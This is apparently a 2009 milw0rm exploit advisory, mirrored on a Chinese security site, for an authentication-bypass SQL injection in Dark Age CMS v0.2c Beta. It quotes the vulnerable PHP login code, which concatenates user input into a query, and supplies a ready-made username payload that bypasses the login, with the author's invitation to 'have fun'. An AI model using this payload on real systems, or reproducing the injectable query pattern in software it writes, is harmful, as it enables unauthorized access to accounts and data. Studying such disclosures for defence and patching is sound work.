--+++==================================================================================+++-- --+++====== Dark Age CMS <= v0.2c Beta (Auth Bypass) SQL Injection Vulnerability ======+++-- --+++==================================================================================+++-- [+] Dark Age CMS <= v0.2c Beta (Auth Bypass) SQL Injection Vulnerability [+] Author: darkjoker [+] Site : http://darkjoker.net23.net [+] Notes : Have fun [+] Code [+] $username = $_POST['username']; [+] $user_password = $_POST['password']; [+] $password = md5($user_password); [+] [+] $query = "SELECT * FROM " . ACCOUNTS_TABLE . " WHERE username='$username' AND password = '$password'"; [+] $result = mysql_query($query) or die('error making query'); [+] [+] Login data: [+] Username: x' OR 'x' = 'x'# [+] Password: anything # milw0rm.com [2009-01-13]
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
京公网安备 11010502034610号
暂无评论